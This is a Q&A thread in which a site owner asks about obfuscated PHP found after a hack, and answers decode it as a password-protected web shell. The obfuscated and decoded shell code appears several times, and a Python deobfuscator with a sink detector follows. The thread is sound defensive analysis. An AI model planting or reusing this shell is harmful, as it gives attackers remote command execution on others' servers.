johnfree

Reputation: 107

My website got hacked - what does this code do?

Someone hacked my site and included this code. Could someone explain what it does?

I've reformatted the spacing for better clarity. I've tried running the code but it looks like all it does is return an md5 hash. Is this harmless?

<? 

$GLOBALS['_131068239_']=Array(
    base64_decode('bWQ' .'1'),
    base64_decode('' .'dXJsZGV' .'jb' .'2Rl'),
    base64_decode('dX' .'JsZGVjb2Rl'),
    base64_decode('c3lz' .'dGVt')); 
?>

<? function 
     _787708145($i)
        {
            $a=Array(
                'MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE=',
                'cA==',
                'cw==',
                '');
            return base64_decode($a[$i]);
        } 
?>

<?php 
    $_0=_787708145(0);

    $_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));

    if($_1!=$_0)exit;

    $_2=$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]);

    if($_2==_787708145(3))exit;

    $GLOBALS['_131068239_'][3]($_2);exit; 
?>

Upvotes: 5

Views: 1327

Answers (5)

Jezza

Reputation: 11

I had a virus all over my WordPress server which included the same md5 encoded key. I posted about it here. It was heavily obfuscated, but below is the fully-decoded virus. They ran the code inside eval() which was inside create_function().

create_function() is deprecated as of PHP 7.2, so upgrading your server's PHP will prevent this from happening again. In my case the backdoor was in every functions.php file on my server, across two websites and every WordPress theme, whether in use or not.

$c = "2caf6917ca3d9a3a85d26029ed623b1a";
$p = md5(urldecode($_REQUEST["p"]));
if ($p != $c) exit;
$s = urldecode($_REQUEST["s"]);
if ($s == "") exit;
system($s);
exit;

I've also been having email troubles, so I suspect they were running programs to send spam.

Upvotes: 1

Alex Andrei

Reputation: 7283

Answer inline in the code comments below.
In short, the script allows a shell to be either written or uploaded to your server.

Later edit: definitely not harmless, burn it with fire.

<?php 

$GLOBALS['_131068239_']=Array(
    base64_decode('bWQ' .'1'), // md5 - php function
    base64_decode('' .'dXJsZGV' .'jb' .'2Rl'), // urldecode - php function
    base64_decode('dX' .'JsZGVjb2Rl'), //urldecode - php function
    base64_decode('c3lz' .'dGVt')); //system - php function


function _787708145($i)
        {
            $a=Array(
                'MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE=',
                'cA==',
                'cw==',
                '');
            return base64_decode($a[$i]);
        } 

$_0=_787708145(0); // md5 hash 2caf6917ca3d9a3a85d26029ed623b1a

$_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));
// this is a function call md5(urldecode($_REQUEST[p]))
// this script is passed an url as a get or post parameter and getting md5 encoded

if($_1!=$_0)exit; // the md5 hash is compared here with the hash above

$_2=$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]); 
// another function call, urldecode($_REQUEST[s])
// another parameter is passed

if($_2==_787708145(3))exit; // if the urldecode above == blank then exit

$GLOBALS['_131068239_'][3]($_2); 
// execute system function with the "s" parameter, system(s)
// basically writing a shell on your server here

exit; 
// job done, exit :)

Upvotes: 6

Harshit

Reputation: 5157

Yes, the above code is a backdoor. It asks the user for a system command, and this code executes that command on your server. Here is what the above code does!!

<? 
// Here all the strings are base64 encoded
$GLOBALS['_131068239_']=Array(
    base64_decode('bWQ' .'1'),                     // md5
    base64_decode('' .'dXJsZGV' .'jb' .'2Rl'),     // urldecode
    base64_decode('dX' .'JsZGVjb2Rl'),             // urldecode
    base64_decode('c3lz' .'dGVt'));                // system - syntax to execute PHP on the server
?>

In the above code, system is used to execute a command on your server.

<? function _787708145($i)     // Function Created
        {
            $a=Array(
                'MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE=',   // MD5 string 2caf6917ca3d9a3a85d26029ed623b1a
                'cA==',      // p
                'cw==',      // s
                '');
            return base64_decode($a[$i]);
        } 
?>

Above is the function that is created.

<?php 
    $_0=_787708145(0);

    $_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));

    if($_1!=$_0)exit;

    $_2=$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]);

    if($_2==_787708145(3))exit;

    $GLOBALS['_131068239_'][3]($_2);exit; 
?>

This line

$_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));

_787708145(1) : p

So $_REQUEST[_787708145(1)] will ask the user to supply a value under the parameter name p.

$GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]) : urlencode($_REQUEST["p"])

$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)])) : md5(urlencode($_REQUEST["p"]))

It will match the password if($_1!=$_0)exit;

$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]); : urlencode($_REQUEST["s"]);

if($_2=="s")exit;

Now comes the final part, i.e.

$GLOBALS['_131068239_'][3]($_2); : system($_2); // $_2 is the value supplied by the user to execute command

Upvotes: 2

Dodo

Reputation: 313

Decoding the base64 strings:

bWQ1 is md5

dXJsZGVjb2Rl is urldecode

c3lzdGVt is system

MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE= is 2caf6917ca3d9a3a85d26029ed623b1a

dXJsZGVjb2Rl is urldecode

cA== is p

cw== is s

dXJsZGVjb2Rl is urldecode

This should provide some insight into the aim of the obfuscated code.

Upvotes: 1

mhall

Reputation: 3701

Not harmless. This is the code with the obfuscation stuff removed:

$_0 = '2caf6917ca3d9a3a85d26029ed623b1a';
$_1 = md5(urldecode($_REQUEST['p']));

if ($_1 != $_0) exit;

$_2 = urldecode($_REQUEST['s']);
if ($_2 == '') exit;

system($_2);
exit;

If this is present in a PHP file on your server, it means that a malicious user can craft a URL with p and s parameters, in order to execute any program on your server (using the system call) with the privileges of the user running your webserver.

I would advise you to get rid of this.

Upvotes: 4
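The answers above decode the sample by hand (Alex Andrei's and Harshit's comments, Dodo's base64 table, mhall's clean version). As an added example that is not part of any answer, the script below does that decoding statically: it folds the base64_decode('..' .'..') concatenations, resolves the $GLOBALS function table and the _787708145() string lookup, and then lists the execution sinks reached from request parameters, which is the triage signal an incident responder wants from a file like this. It assumes the sample is laid out as the single PHP block embedded below (constructed from the question's code), and its regexes are tailored to this sample's two indirection layers rather than being a general PHP deobfuscator.

```python
import base64
import re

# Constructed sample: the question's obfuscated backdoor, squeezed into one PHP block.
SAMPLE = r"""<?php
$GLOBALS['_131068239_']=Array(base64_decode('bWQ' .'1'),
 base64_decode('' .'dXJsZGV' .'jb' .'2Rl'), base64_decode('dX' .'JsZGVjb2Rl'),
 base64_decode('c3lz' .'dGVt'));
function _787708145($i){ $a=Array('MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE=',
 'cA==','cw==',''); return base64_decode($a[$i]); }
$_0=_787708145(0);
$_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));
if($_1!=$_0)exit;
$_2=$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]);
if($_2==_787708145(3))exit;
$GLOBALS['_131068239_'][3]($_2);exit;
?>"""
LITERALS = r"'([^']*)'"                   # one single-quoted PHP literal
CONCAT = r"((?:'[^']*'\s*\.?\s*)+)"       # 'a' .'b' runs (string concatenation)
ELEMS = r"((?:'[^']*'\s*,?\s*)+)"         # 'a', 'b' runs (array elements)
SINKS = ("system", "exec", "shell_exec", "passthru", "eval", "create_function")

def b64(s):
    return base64.b64decode(s).decode()

def fold_base64(src):
    """Rewrite base64_decode('bWQ' .'1') to the literal 'md5', in place."""
    return re.sub(r"base64_decode\(\s*" + CONCAT + r"\)",
                  lambda m: "'" + b64("".join(re.findall(LITERALS, m.group(1)))) + "'", src)

def deobfuscate(src):
    """Undo the two indirection layers this sample uses and return readable PHP."""
    src = fold_base64(src)
    # Layer 1: $GLOBALS['<id>']=Array('md5','urldecode',...) used as a function table.
    m = re.search(r"\$GLOBALS\['(\w+)'\]=Array\(" + ELEMS + r"\);\n?", src)
    funcs = re.findall(LITERALS, m.group(2))
    src = src.replace(m.group(0), "")
    src = re.sub(r"\$GLOBALS\['" + m.group(1) + r"'\]\[(\d+)\]",
                 lambda x: funcs[int(x.group(1))], src)
    # Layer 2: helper _NNN($i) that returns base64_decode($a[$i]) from a string table.
    m = re.search(r"function (\w+)\(\$i\)\{ \$a=Array\(" + ELEMS
                  + r"\); return base64_decode\(\$a\[\$i\]\); \}\n?", src)
    strings = [b64(s) for s in re.findall(LITERALS, m.group(2))]
    src = src.replace(m.group(0), "")
    return re.sub(m.group(1) + r"\((\d+)\)", lambda x: "'" + strings[int(x.group(1))] + "'", src)

def risky_calls(php):
    """Execution sinks present in the cleaned code when request data is also read (triage aid)."""
    hits = [f for f in SINKS if re.search(r"\b" + f + r"\(", php)]
    return hits if re.search(r"\$_(REQUEST|GET|POST)\b", php) else []
```

Running deobfuscate(SAMPLE) yields the same seven-line script mhall shows, and risky_calls() on that output reports the system() sink fed by $_REQUEST.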
